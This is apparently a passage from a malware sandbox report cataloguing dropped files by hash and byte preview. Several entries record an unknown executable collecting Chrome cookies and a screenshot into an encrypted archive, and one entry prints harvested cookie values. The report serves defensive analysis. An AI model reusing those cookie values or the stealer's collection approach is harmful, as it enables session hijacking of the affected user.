                                                                                    Malicious:false
                                                                                    Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                                                                    C:\Users\user\AppData\Local\Temp\TCDEFF7.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):278
                                                                                    Entropy (8bit):3.544065206514744
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                                                                    MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                                                    SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                                                    SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                                                                    SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDF4CB.tmp\Main_Event.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):2924237
                                                                                    Entropy (8bit):7.970803022812704
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                    MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                    SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                    SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                    SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                    Malicious:false
                                                                                    Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDF4CB.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):286
                                                                                    Entropy (8bit):3.5434534344080606
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                                                                    MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                                                    SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                                                    SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                                                    SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDF589.tmp\Mesh.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):3078052
                                                                                    Entropy (8bit):7.954129852655753
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                    MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                    SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                    SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                    SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                    Malicious:false
                                                                                    Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDF589.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):274
                                                                                    Entropy (8bit):3.5303110391598502
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                                                                    MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                                                    SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                                                    SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                                                    SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDF992.tmp\Vapor_Trail.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):3611324
                                                                                    Entropy (8bit):7.965784120725206
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                    MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                    SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                    SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                    SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                    Malicious:false
                                                                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDF992.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):288
                                                                                    Entropy (8bit):3.5359188337181853
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                                                                    MD5:0FEA64606C519B78B7A52639FEA11492
                                                                                    SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                                                    SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                                                    SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDFA9E.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):274
                                                                                    Entropy (8bit):3.4699940532942914
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                                                                    MD5:55BA5B2974A072B131249FD9FD42EB91
                                                                                    SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                                                                    SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                                                                    SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDFA9E.tmp\Insight design set.dotx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Word 2007+
                                                                                    Category:dropped
                                                                                    Size (bytes):3465076
                                                                                    Entropy (8bit):7.898517227646252
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                    MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                    SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                    SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                    SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                    Malicious:false
                                                                                    Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                                                                    C:\Users\user\AppData\Local\Temp\U3ckrmC1adMWW2H.ligma

                                                                                    Download File
                                                                                    Process:C:\7037005\vhcst.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):44711
                                                                                    Entropy (8bit):7.992674644449636
                                                                                    Encrypted:true
                                                                                    SSDEEP:768:6vXmNEMPhJOxCnep6ejrRpwD91ADxCCKLcdTENsJHvvlEhayqLw0CEeI:0XBMPhJ35ebsOFCC5TEN6FV2oD
                                                                                    MD5:1D3A4BE434018A0EEECE6EB3E431BA3D
                                                                                    SHA1:284FE4D8820F5065B25372F353A145BE627840E6
                                                                                    SHA-256:46B06C3880F65ED7114DB63825359410EE2181A5AF4EADA6A759249DBD14509A
                                                                                    SHA-512:103CBC6D17D51A372E9FFDDD1A2E250B9F6C83CFB68B69F8E39C5743B3D2472294FF7207C19E2AA8B424DC70476F74B4E6D7929B2614FA27E94E694472DF2E89
                                                                                    Malicious:false
                                                                                    Preview:PK........x.yY{..........#...Browsers/Cookies/Chrome Cookies.txt.WK....].).#..n....E/x..m.~oZ.....<..5.o..3.$Rn..,....:u..9_...}.......=s.b{.. ...$@.H.Bn2.9...x..<.....S...w].E..'.E..3.[,d....'....i......P...,t.6_Xw2n..>...Y+...sgK.q.n..l.....z...?W.t......e.y.[.'~~.d1`...m....p;h.(......yY?...<.......E.!2......{R...Z^.'.R..2o..+.yya....}.g|.....e.!.....[.R.....s.gx......Ft..].....U.@..7..e.M....~`1=.l...,ca.4..c..C2./.W....8...P<..E..I..7|^'Q......B<,...EM-.u...3......OfS...)..v..H....V9..i.AkZ........).B.n.:....J~...%).....v...v....mJ.:..X..#v...0.mP#..2.#G.,.z.c..S]E.... .......k..e06s.5.[...2x.,.pYO...,..4:..f..>.y..!.YO."...E..A"..v:..&Hr...#...g.O..x1.b.$.#.}...f.&KYD.H.,.Y..7..g-....(c..+.1"4.......~.#H...._}../. B |Z..O...HTB..P.@.-..^..`@;.......v~A.E.b......I..>..I.n.Yx\...q.....'%.".-6..?H.EB..".9?y.NU.!QR...)".h.....E..P.g........1z..2S.Ii..... .c.>#03.....JI...b@.eV..C....\.Y...E..v.....%j.^.x.l..V.{z.........f?..3Z....

                                                                                    C:\Users\user\AppData\Local\Temp\U3ckrmC1adMWW2H\Browsers\Cookies\Chrome Cookies.txt

                                                                                    Download File
                                                                                    Process:C:\7037005\vhcst.exe
                                                                                    File Type:ASCII text, with very long lines (522), with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):3345
                                                                                    Entropy (8bit):5.8601905602672835
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:jJMpoO2gFcRqFZL2L+yLstv3pPDYReynqsbCw4R2cksr:NFFRiNEUd7
                                                                                    MD5:A3E0FD5B00C49B355B00B3083DA7C5CB
                                                                                    SHA1:A809B694054810FE687456F187E5FC2C2CEFA507
                                                                                    SHA-256:592564F2EB5C54230CC985CDAB59C4AFD497EA11DC922CC72DF20172556B1354
                                                                                    SHA-512:EEB56A85B9200B40F5CBFD0CFEEA2F1E70B1C56F775EE186C5030B6E494C3F72614B8E728AF45BADA3216D74F45CD84FBAF000026A786F92235741D260C13A24
                                                                                    Malicious:false
                                                                                    Preview:.google.com.TRUE./.FALSE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.TRUE.13340887435186329..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.TRUE.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474...microsoft.com.TRUE./.FALSE.13372422837017624.MC1.GUID=749eee6039c5489b9db3000c7ab3f

                                                                                    C:\Users\user\AppData\Local\Temp\U3ckrmC1adMWW2H\Display\Display.png

                                                                                    Download File
                                                                                    Process:C:\7037005\vhcst.exe
                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):56822
                                                                                    Entropy (8bit):7.641596251110616
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:LoM+WoGrjACRSnkXeJA30pLTyu+8V6kkkkkkkkkkkwHOwnk+XGoo8c3Rkkkkkkk6:0buZR0kX+AeMS+HzZA3ELNO31VPLVB
                                                                                    MD5:842456D5E0EED4F192F15E53BC5EB3AD
                                                                                    SHA1:D14E6430985441F30550EAEF372328718EA98321
                                                                                    SHA-256:B57FAD188A3D5ACE11BCDF18F0DB9FF9F213CC8DFB9D8B2EEE68B5B07C00F4CF
                                                                                    SHA-512:C5EAFE6D6D8FC9AD2848BE0B74CC9089A9A7AC8D154D04F6C13FAE61329AE6A1AAAD4BFFE777A85CDC51D6964F08C5F055F9AE04E458A7C4318CE113FE04FF29
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d...IDATx^....tW}......Nn.$v.{..t..zH..7.....q.L6...M.8.x.`#.`........cf.B. .... 4.4...g.....~.....]g...T.i.....y.O..Zk..jW........x.@.$I.$Ir=...$I.$I.k...$I.$I.\c..$I.$I...+.$I.$I.$.X. I.$I.$....I.$I.$.5V.H.$I.$I...@.$I.$Ir....$I.$I.k...w.}....kU....~.qo.~..o...........z..........[.q.}..z.6$I.$Ir.......<...............a.._z.d...r.......mal.:S....S.....>...=.H....{..]...d....|.,.q......Z.$I.$Ir..L..s..\.......Y.8......}...p...V.`.Y.w.e......z...O...?....s..Q.mG.$I.$..[a......Il..0...j...o7.pm....o..M.....<.._|..-8.D.q|..xWb[~ly..H.d..Am..'.rl..O..h...n.v...........Y.v[.Gy[......W[..4u\I;.a.O.}..c.A..]^..|+....@...7k.7S...y.<..9....e..3.$.7..-.s..su....FY.u.....9..|........`k|.w/...?..7.....|...rL...c9...SL.#Ir..j.0#..."...c...*.....o*....~.xA...j..q..z..|...u^.y.L...|.......b<.m...L...,..v}..[...........S.N..6..y..z.L...-...y.L.';.Z}.8.._..p.....

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hgug5ci.gb4.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30ntbxrq.gz1.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53tpua4y.fpe.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwidqxxq.a52.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0dsi1t2.hp4.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jke5pnux.xsn.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
